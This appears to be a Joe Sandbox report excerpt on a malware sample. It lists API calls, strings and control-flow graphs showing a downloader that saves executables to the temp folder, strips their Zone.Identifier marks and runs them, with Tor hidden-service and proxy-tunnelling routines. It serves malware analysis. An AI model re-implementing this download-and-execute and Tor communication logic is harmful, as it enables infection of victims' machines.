              • Opcode Fuzzy Hash: c40706bca5d4e14b35deb460e56c01fa32e3d7b65d6f5b3095e25b28bf9a2232
              • Instruction Fuzzy Hash: DDC0127526C10D6B8B00DFACED41C6633AC9748B107008304F60DC7140C530E4009794
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CryptDestroyHash.ADVAPI32(009A9A05,?,009A2B2E,?,?,009A9A05,?,?,?,?,?,?), ref: 009A2A67
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: CryptDestroyHash
              • String ID:
              • API String ID: 174375392-0
              • Opcode ID: 161ffb8dfc51171c7d820c0e73885e3c37cf23dbaed43f824bc7419c61b9f51c
              • Instruction ID: 77a0f315306d5e20128a044b8b6b285d17116c60d87d845750301031cdd10b34
              • Opcode Fuzzy Hash: 161ffb8dfc51171c7d820c0e73885e3c37cf23dbaed43f824bc7419c61b9f51c
              • Instruction Fuzzy Hash: 67B0123102430CD78A006BD9E808889779CA6086107004000B50CC3101C630F40056E1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: memmove
              • String ID:
              • API String ID: 2162964266-0
              • Opcode ID: 40a47e0ae16ecd65d32b287db5505c5ff060c3b3ed2938d8d6571f0f2dee0396
              • Instruction ID: 336d7fffb47ab8428e88a675a1007e1910fed252b83a0f040f646ebc7a46e999
              • Opcode Fuzzy Hash: 40a47e0ae16ecd65d32b287db5505c5ff060c3b3ed2938d8d6571f0f2dee0396
              • Instruction Fuzzy Hash: A451D4B0E142188BDB28DFA9C95079EFBB2FF48300F1091AED11DAB394E7754A858F55
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              APIs
              • GetTickCount.KERNEL32 ref: 009B0419
              • srand.MSVCRT ref: 009B0420
              • rand.MSVCRT ref: 009B0428
              • Sleep.KERNEL32 ref: 009B043F
              • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 009B045D
              • strlen.MSVCRT ref: 009B0467
              • mbstowcs.MSVCRT ref: 009B047E
              • rand.MSVCRT ref: 009B0486
              • rand.MSVCRT ref: 009B049A
              • wsprintfW.USER32 ref: 009B04C1
              • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36,00000000,00000000,00000000,00000000), ref: 009B04D7
              • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 009B0506
              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 009B0535
              • memset.MSVCRT ref: 009B055C
              • InternetReadFile.WININET(00000000,?,00000207,?), ref: 009B057E
              • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 009B05AF
              • CloseHandle.KERNEL32(000000FF), ref: 009B05BE
              • Sleep.KERNEL32(000003E8), ref: 009B05C9
              • wsprintfW.USER32 ref: 009B05E2
              • DeleteFileW.KERNEL32(?), ref: 009B05F2
              • Sleep.KERNEL32(000003E8), ref: 009B05FD
              • Sleep.KERNEL32(000003E8), ref: 009B061E
              • DeleteFileW.KERNEL32(?), ref: 009B064B
              • CloseHandle.KERNEL32(000000FF), ref: 009B0658
              • InternetCloseHandle.WININET(00000000), ref: 009B0665
              • InternetCloseHandle.WININET(00000000), ref: 009B0672
              • Sleep.KERNEL32(000003E8), ref: 009B067D
              • rand.MSVCRT ref: 009B0692
              • Sleep.KERNEL32 ref: 009B06A9
              • rand.MSVCRT ref: 009B06AF
              • rand.MSVCRT ref: 009B06C3
              • wsprintfW.USER32 ref: 009B06EA
              • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 009B0707
              • wsprintfW.USER32 ref: 009B0723
              • DeleteFileW.KERNEL32(?), ref: 009B0733
              • Sleep.KERNEL32(000003E8), ref: 009B073E
              • Sleep.KERNEL32(000003E8), ref: 009B075F
              • DeleteFileW.KERNEL32(?), ref: 009B077D
              Strings
              • %ls\%d%d.exe, xrefs: 009B04B5
              • %temp%, xrefs: 009B0458
              • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36, xrefs: 009B04D2
              • %ls:Zone.Identifier, xrefs: 009B0717
              • %ls\%d%d.exe, xrefs: 009B06DE
              • %ls:Zone.Identifier, xrefs: 009B05D6
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: FileSleep$rand$Internet$CloseDeleteHandlewsprintf$Open$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcsmemsetsrandstrlen
              • String ID: %ls:Zone.Identifier$%ls:Zone.Identifier$%ls\%d%d.exe$%ls\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
              • API String ID: 827890202-3055678928
              • Opcode ID: 5b66c8eefcdd6adaca8a497ae8ebc9bfb152b19f3d9cc8f838c5d93785810171
              • Instruction ID: 341d410b93b3cbc8620359280a91afd3728e2b7fbfd920ac65a407d5a3ec6ff7
              • Opcode Fuzzy Hash: 5b66c8eefcdd6adaca8a497ae8ebc9bfb152b19f3d9cc8f838c5d93785810171
              • Instruction Fuzzy Hash: E58106B5904318ABDB20EB60DD4AFEE3339BFC8710F044698F209951D1DAB4AB90DF61
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1247 9a81c0-9a8334 call 9b41c0 call 9a2100 * 14 call 9a35d0 call 9a3c20 1282 9a833a-9a8352 call 9a3c20 1247->1282 1283 9a8962 1247->1283 1289 9a8358-9a8391 call 9a3a30 1282->1289 1290 9a8960 1282->1290 1284 9a8969-9a8982 call 9a35f0 1283->1284 1294 9a839f-9a83ab 1289->1294 1295 9a8393-9a839d 1289->1295 1290->1284 1296 9a83b1-9a83ba 1294->1296 1295->1296 1297 9a8938-9a8941 1296->1297 1298 9a83c0-9a8445 inet_ntop call 9a8990 1296->1298 1299 9a8953 1297->1299 1300 9a8943 1297->1300 1308 9a844b-9a8466 1298->1308 1309 9a8926-9a892f 1298->1309 1301 9a8953 call 9a3b80 1299->1301 1303 9a8943 call 9a3b80 1300->1303 1304 9a8958-9a895e 1301->1304 1306 9a8948-9a8951 1303->1306 1304->1290 1306->1290 1313 9a846c-9a8493 call 9b4030 1308->1313 1314 9a8917-9a8923 call 9a3410 1308->1314 1310 9a8933 1309->1310 1311 9a8931 1309->1311 1310->1297 1311->1297 1319 9a849a-9a84a3 1313->1319 1314->1309 1320 9a84a9-9a84b2 1319->1320 1321 9a887d-9a8886 1319->1321 1320->1321 1322 9a84b8-9a84d7 1320->1322 1321->1314 1323 9a888c-9a889c call 9b4080 1321->1323 1327 9a84dd-9a850b 1322->1327 1328 9a8876 1322->1328 1323->1314 1329 9a889e-9a88bf 1323->1329 1332 9a850d-9a8521 1327->1332 1333 9a8527-9a852e 1327->1333 1328->1321 1334 9a8903-9a8909 1329->1334 1335 9a88c1-9a88e6 1329->1335 1332->1333 1337 9a8872 1333->1337 1338 9a8534-9a856a 1333->1338 1336 9a8910 1334->1336 1335->1334 1341 9a88e8-9a88f2 1335->1341 1336->1314 1337->1321 1344 9a885b 1338->1344 1345 9a8570-9a859e 1338->1345 1341->1334 1343 9a88f4-9a8901 1341->1343 1343->1334 1343->1336 1346 9a8862-9a8878 1344->1346 1349 9a8852 1345->1349 1350 9a85a4-9a85d2 1345->1350 1346->1319 1352 9a8859 1349->1352 1354 9a85d8-9a85f7 1350->1354 1355 9a8849 1350->1355 1352->1346 1358 9a85fd-9a8649 1354->1358 1359 9a8847 1354->1359 1356 9a8850 1355->1356 1356->1352 1361 9a864f-9a8679 1358->1361 1362 9a8840 1358->1362 1359->1356 1365 9a867b-9a868e 1361->1365 1366 9a86f9 1361->1366 1362->1359 1365->1366 1371 9a8690-9a86a6 1365->1371 1367 9a8703-9a8718 1366->1367 1369 9a871a-9a8730 1367->1369 1370 9a876e 1367->1370 1369->1370 1376 9a8732-9a8748 1369->1376 1372 9a8778-9a87c0 lstrlenA call 9a30f0 1370->1372 1371->1366 1378 9a86a8-9a86be 1371->1378 1379 9a87c2-9a87f2 call 9a3040 1372->1379 1380 9a8837 1372->1380 1376->1370 1386 9a874a-9a8760 1376->1386 1378->1366 1389 9a86c0-9a86d3 1378->1389 1387 9a882e 1379->1387 1388 9a87f4-9a8823 call 9b3fa0 1379->1388 1382 9a883e 1380->1382 1382->1359 1386->1370 1395 9a8762-9a876c 1386->1395 1391 9a8835 1387->1391 1396 9a882c 1388->1396 1397 9a8825 1388->1397 1389->1366 1398 9a86d5-9a86eb 1389->1398 1391->1382 1395->1372 1396->1391 1397->1396 1398->1366 1400 9a86ed-9a86f7 1398->1400 1400->1367
              APIs
                • Part of subcall function 009A2100: memmove.MSVCRT ref: 009A210F
                • Part of subcall function 009A35D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,009B403F,00000001,?,009B3F8F,-00000007,?,009AEEB2,-00000053,?,009AEE82,-00804C3B,?,009AED83), ref: 009A35DB
              • inet_ntop.WS2_32(00000002,?,?,00000080), ref: 009A83E6
              • lstrlenA.KERNEL32(?,?,00000014,00000040), ref: 009A87A5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: CriticalEnterSectioninet_ntoplstrlenmemmove
              • String ID: p $r $r $s $ BadExit$ Exit$ Fast$ Guard$ Running$ Stable$ StaleDesc$ Valid$ circwindow=$%*s %s %s %*s %*s %*s %s %s %hu$<$HSDir $accept 1-65535$directory-footer$http://%s:%hu/tor/status-vote/current/consensus.z
              • API String ID: 3485021903-298003833
              • Opcode ID: 51f5876587be11856472ff9121500ca5d2419fd157c1a208b88d10759a2d93e0
              • Instruction ID: 19b83464c4aa942c7785c3351cd416420e66b54aeffc8dfd84e6ab1971c3e6a7
              • Opcode Fuzzy Hash: 51f5876587be11856472ff9121500ca5d2419fd157c1a208b88d10759a2d93e0
              • Instruction Fuzzy Hash: 2B22A4B5D142689FDB24DB54CC45FEAB7B8EF89300F0085D9E609B6281DBB45E84CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1424 9acad0-9acbe5 call 9b3f50 call 9a2100 * 10 call 9a34a0 1449 9acbeb-9acc1b call 9a3830 1424->1449 1450 9ad00c-9ad03d call 9b3f80 1424->1450 1455 9acffd-9ad009 call 9a3410 1449->1455 1456 9acc21-9acc3d 1449->1456 1455->1450 1456->1455 1460 9acc43-9acc70 call 9a3830 1456->1460 1460->1455 1463 9acc76-9acc8a 1460->1463 1463->1455 1465 9acc90-9accbe call 9a3830 1463->1465 1465->1455 1468 9accc4-9accf2 call 9a30f0 1465->1468 1468->1455 1471 9accf8-9acd1e call 9a3650 1468->1471 1471->1455 1474 9acd24-9acd50 call 9b4080 1471->1474 1478 9acff2-9acff8 call 9b4030 1474->1478 1479 9acd56-9acd63 1474->1479 1478->1455 1479->1478 1480 9acd69-9acda3 call 9b4170 call 9a3830 1479->1480 1486 9acda9-9acde5 call 9b4170 call 9a3830 1480->1486 1487 9acfd5-9acfed call 9b4170 call 9a3410 1480->1487 1486->1487 1496 9acdeb-9ace27 call 9b4170 call 9a3830 1486->1496 1496->1487 1501 9ace2d-9ace85 call 9b4170 call 9a3830 1496->1501 1501->1487 1507 9ace8b-9acecf call 9b4170 call 9a3830 1501->1507 1507->1487 1512 9aced5-9acf0b lstrlenA call 9a30f0 1507->1512 1512->1487 1515 9acf11-9acf3b call 9a3040 1512->1515 1515->1487 1518 9acf41-9acf6b call 9a3040 1515->1518 1518->1487 1521 9acf6d-9acfd3 memmove 1518->1521 1521->1487
              APIs
                • Part of subcall function 009A2100: memmove.MSVCRT ref: 009A210F
              • _longjmp.LIBVCRUNTIMED ref: 009ACBD8
              • task.LIBCPMTD ref: 009AD02F
                • Part of subcall function 009A3830: lstrlenA.KERNEL32(00000000), ref: 009A3862
                • Part of subcall function 009A3830: lstrlenA.KERNEL32(?), ref: 009A387E
              • lstrlenA.KERNEL32(?,?,00000014,00000020,?,?,?,?,?,?,?,?,00000000), ref: 009ACEF0
              • memmove.MSVCRT ref: 009ACFC0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: lstrlen$memmove$_longjmptask
              • String ID: -----END MESSAGE-----$-----END RSA PUBLIC KEY-----$<$introduction-point $introduction-points-----BEGIN MESSAGE-----$ip-address $onion-key$onion-port $protocol-versions $secret-id-part $service-key
              • API String ID: 3796934367-2400399560
              • Opcode ID: b658ed9d9d34af5365b9a3117f1bfbe75db384d961f738cca31b89e9630f6ed0
              • Instruction ID: 91d2c3bf7fe0472349c99644ac93683219ea318c3ca4e12c10e9a3e679fdbce0
              • Opcode Fuzzy Hash: b658ed9d9d34af5365b9a3117f1bfbe75db384d961f738cca31b89e9630f6ed0
              • Instruction Fuzzy Hash: BBE189F1A543186BDB14DB94DC42FEEB379AF99700F048198F605AB182EB719B44CFA1
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 1522 9a62e0-9a6369 call 9b41c0 call 9a33f0 call 9a2100 * 4 1535 9a636b-9a637b lstrlenA 1522->1535 1536 9a637d 1522->1536 1537 9a6387-9a6397 1535->1537 1536->1537 1538 9a639d-9a63a9 SetLastError 1537->1538 1539 9a6780-9a6783 1537->1539 1540 9a63ab-9a63bb lstrlenA 1538->1540 1541 9a63bd 1538->1541 1542 9a6789-9a6792 1539->1542 1543 9a63c7-9a63ff 1540->1543 1541->1543 1544 9a67a0-9a67a9 1542->1544 1545 9a6794-9a679d call 9a3410 1542->1545 1549 9a6773-9a677c GetLastError 1543->1549 1550 9a6405-9a6409 1543->1550 1545->1544 1551 9a677e 1549->1551 1552 9a640b-9a641b lstrlenA 1550->1552 1553 9a641d 1550->1553 1551->1542 1554 9a6427-9a6434 1552->1554 1553->1554 1555 9a6441 1554->1555 1556 9a6436-9a643f 1554->1556 1557 9a644b-9a644f 1555->1557 1556->1557 1558 9a645d 1557->1558 1559 9a6451-9a645b 1557->1559 1560 9a6467-9a646b 1558->1560 1559->1560 1561 9a6478 1560->1561 1562 9a646d-9a6476 1560->1562 1563 9a6482-9a656d lstrlenA 1561->1563 1562->1563 1571 9a674e-9a6757 GetLastError 1563->1571 1572 9a6573-9a658f 1563->1572 1573 9a6759-9a6762 1571->1573 1577 9a65cb-9a65d1 1572->1577 1578 9a6591-9a6595 1572->1578 1574 9a6771 1573->1574 1575 9a6764-9a676a 1573->1575 1574->1551 1575->1574 1581 9a6737-9a6740 GetLastError 1577->1581 1582 9a65d7-9a65fc 1577->1582 1579 9a659f-9a65c5 call 9a34d0 1578->1579 1580 9a6597-9a659b 1578->1580 1589 9a65c9 1579->1589 1590 9a65c7 1579->1590 1580->1577 1584 9a6742-9a674c 1581->1584 1587 9a672a-9a6733 GetLastError 1582->1587 1588 9a6602-9a660c 1582->1588 1584->1573 1594 9a6735 1587->1594 1592 9a6728 1588->1592 1593 9a6612-9a663b 1588->1593 1589->1572 1590->1577 1592->1594 1593->1592 1596 9a6641-9a6654 1593->1596 1594->1584 1596->1592 1598 9a665a-9a66a9 call 9a33f0 call 9a34a0 1596->1598 1598->1592 1603 9a66ab-9a66d3 call 9a1fb0 1598->1603 1606 9a670e-9a6717 1603->1606 1607 9a66d5-9a66d9 1603->1607 1606->1592 1609 9a6719-9a6725 call 9a3410 1606->1609 1607->1606 1608 9a66db-9a6707 call 9a3410 1607->1608 1608->1606 1609->1592
              APIs
                • Part of subcall function 009A2100: memmove.MSVCRT ref: 009A210F
              • lstrlenA.KERNEL32(00000000), ref: 009A636F
              • SetLastError.KERNEL32(00000000), ref: 009A639F
              • lstrlenA.KERNEL32(00000000), ref: 009A63AF
              • lstrlenA.KERNEL32(00000000), ref: 009A640F
              • lstrlenA.KERNEL32(?), ref: 009A653A
              • _longjmp.LIBVCRUNTIMED ref: 009A669C
              • GetLastError.KERNEL32 ref: 009A672A
              • GetLastError.KERNEL32 ref: 009A6737
              • GetLastError.KERNEL32 ref: 009A674E
              • GetLastError.KERNEL32 ref: 009A6773
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: ErrorLast$lstrlen$_longjmpmemmove
              • String ID: %s%s%sConnection: closeAccept-Encoding: gzip$Proxy-Connection: close$deflate$gzip
              • API String ID: 3717562076-1391079651
              • Opcode ID: ad333316f6aeaec999668608f71716dc844c93f85d914a31f81b76b40e54ccc9
              • Instruction ID: 49196fcf64d2c7d4f4dddb523f1eab23c8bf9904ca45d54ae33616951686d743
              • Opcode Fuzzy Hash: ad333316f6aeaec999668608f71716dc844c93f85d914a31f81b76b40e54ccc9
              • Instruction Fuzzy Hash: AAE17DB5914258DFDB14CFA4DC45BEEB7B8BF49304F088188F645A7284DBB49985CF90
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 009A4220: GetLastError.KERNEL32 ref: 009A4264
                • Part of subcall function 009A4220: GlobalFree.KERNEL32(00000000), ref: 009A42FE
                • Part of subcall function 009A4220: GlobalFree.KERNEL32(00000000), ref: 009A430E
                • Part of subcall function 009A4220: GlobalFree.KERNEL32(00000000), ref: 009A431E
              • freeaddrinfo.WS2_32(?,00000004,00000009), ref: 009A4C67
                • Part of subcall function 009A49C0: socket.WS2_32(?,?,?), ref: 009A4A1E
                • Part of subcall function 009A49C0: connect.WS2_32(000000FF,?,?), ref: 009A4A48
                • Part of subcall function 009A49C0: freeaddrinfo.WS2_32(?), ref: 009A4AA5
              Strings
              • , xrefs: 009A4B5D
              • CONNECT %s:%s HTTP/1.0Host: %s:%sPragma: no-cacheContent-Length: 0Proxy-Connection: Keep-Alive%s, xrefs: 009A4D61
              • CONNECT %s:%s HTTP/1.1Pragma: no-cacheProxy-Connection: Keep-Alive%s, xrefs: 009A4F13
              • , xrefs: 009A4D6E
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: FreeGlobal$freeaddrinfo$ErrorLastconnectsocket
              • String ID: $ $CONNECT %s:%s HTTP/1.0Host: %s:%sPragma: no-cacheContent-Length: 0Proxy-Connection: Keep-Alive%s$CONNECT %s:%s HTTP/1.1Pragma: no-cacheProxy-Connection: Keep-Alive%s
              • API String ID: 3188732148-200375032
              • Opcode ID: c3732e8ade6719ba99f5389ef610bb033c113b4d0a41c5fbc8ec66dcb74226d9
              • Instruction ID: a3619864471035f939ccbab88e0b965dd9a9a1c1561fb167ec9f72875933bb6a
              • Opcode Fuzzy Hash: c3732e8ade6719ba99f5389ef610bb033c113b4d0a41c5fbc8ec66dcb74226d9
              • Instruction Fuzzy Hash: 12F1B171A042689BDF24DB55DC41BEAB3B9AF85304F0484D9F14DAB181DAB49F84CFE1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 009A35D0: EnterCriticalSection.KERNEL32(00000001,00000001,?,009B403F,00000001,?,009B3F8F,-00000007,?,009AEEB2,-00000053,?,009AEE82,-00804C3B,?,009AED83), ref: 009A35DB
                • Part of subcall function 009A70D0: lstrlenA.KERNEL32(009ADC70,?,009ADC70,?,00000040,00000000), ref: 009A70DA
              • lstrlenA.KERNEL32(?), ref: 009ADD1F
              • memmove.MSVCRT ref: 009ADEB6
                • Part of subcall function 009A7190: lstrlenA.KERNEL32(?,?,?,009ADC8D,?,?,?,00000040,00000000), ref: 009A7198
              • memmove.MSVCRT ref: 009AE24B
              • memmove.MSVCRT ref: 009AE2B3
              • memmove.MSVCRT ref: 009AE2F7
              • PostQueuedCompletionStatus.KERNEL32(?,00000001,00000010,?), ref: 009AE333
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: memmove$lstrlen$CompletionCriticalEnterPostQueuedSectionStatus
              • String ID: $@
              • API String ID: 2473233352-1077428164
              • Opcode ID: 0f96e81cc927401d35b9173f712d2698c1ed09159be7544052381de7a9d50386
              • Instruction ID: e6a4023b3987e53e1a36c12ae573ed28ee07847a6e31f4e722320476fbaa4a4c
              • Opcode Fuzzy Hash: 0f96e81cc927401d35b9173f712d2698c1ed09159be7544052381de7a9d50386
              • Instruction Fuzzy Hash: 2C225270F05129AFDB2ADB15DCA1AA9B7BABB51304F04C5E9D0095B381DB369F85CF80
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetTempPathW.KERNEL32(00000104,?,?,?,?), ref: 009B1245
              • rand.MSVCRT ref: 009B126E
              • rand.MSVCRT ref: 009B1282
              • wsprintfW.USER32 ref: 009B12A9
                • Part of subcall function 009B1130: CreateFileW.KERNEL32(00000001,C0000000,?,00000000,00000000,?,00000000,?,00000002,00000001,00000080), ref: 009B1153
                • Part of subcall function 009B1130: SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 009B116C
                • Part of subcall function 009B1130: WriteFile.KERNEL32(000000FF,?,?,00000000,00000000), ref: 009B1198
                • Part of subcall function 009B1130: CloseHandle.KERNEL32(000000FF), ref: 009B11CD
              • Sleep.KERNEL32(000003E8), ref: 009B12ED
                • Part of subcall function 009AFE60: CryptImportKey.ADVAPI32(015379A0,009B5940,00000214,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009B0750), ref: 009AFE8A
                • Part of subcall function 009AFE60: CreateFileW.KERNEL32(009B0750,C0000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,009B0750), ref: 009AFEAB
                • Part of subcall function 009AFE60: GetFileSize.KERNEL32(000000FF,00000000), ref: 009AFEC4
                • Part of subcall function 009AFE60: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 009AFEE5
                • Part of subcall function 009AFE60: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 009AFF04
                • Part of subcall function 009AFE60: CryptCreateHash.ADVAPI32(015379A0,00008004,00000000,00000000,?), ref: 009AFF56
                • Part of subcall function 009AFE60: GetProcessHeap.KERNEL32(00000000,00000000), ref: 009AFF8D
                • Part of subcall function 009AFE60: HeapAlloc.KERNEL32(00000000), ref: 009AFF94
              • Sleep.KERNEL32(000003E8), ref: 009B130E
                • Part of subcall function 009B0080: memset.MSVCRT ref: 009B008E
                • Part of subcall function 009B0080: memset.MSVCRT ref: 009B009E
                • Part of subcall function 009B0080: CreateProcessW.KERNELBASE(00000000,009B0771,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 009B00D7
                • Part of subcall function 009B0080: Sleep.KERNELBASE(000003E8), ref: 009B00E7
              • DeleteFileW.KERNEL32(?), ref: 009B132C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254302274.00000000009B9000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254333795.00000000009BB000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_9a0000_6K1uYM85lS.jbxd
              Similarity
              • API ID: File$Create$Sleep$CryptHeapProcessmemsetrand$AllocCloseDeleteHandleHashImportMappingPathPointerSizeTempViewWritewsprintf
              • String ID: %ls\%d%d.exe
              • API String ID: 1034425663-165811362
              • Opcode ID: 7f608b59313050fe621189b1033661d5b0de664089c899bb27d49bf7d44bc00e
              • Instruction ID: 1a30c48795cbf461743e3830c40f51dc4212d74eb5b463aad7c1762e2812063f
              • Opcode Fuzzy Hash: 7f608b59313050fe621189b1033661d5b0de664089c899bb27d49bf7d44bc00e
              • Instruction Fuzzy Hash: 5A3126B1A0021D9BCB10EB54DD99FEE73B9BF88314F804598F60D96181EA34AE80CF65
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • inet_ntop.WS2_32(00000002,?,?,00000080), ref: 009A83E6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2254157800.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000000.00000002.2253920637.00000000009A0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2254202198.00000000009B5000.00000002.00000001.01000000.00000003.sdmpDownload File
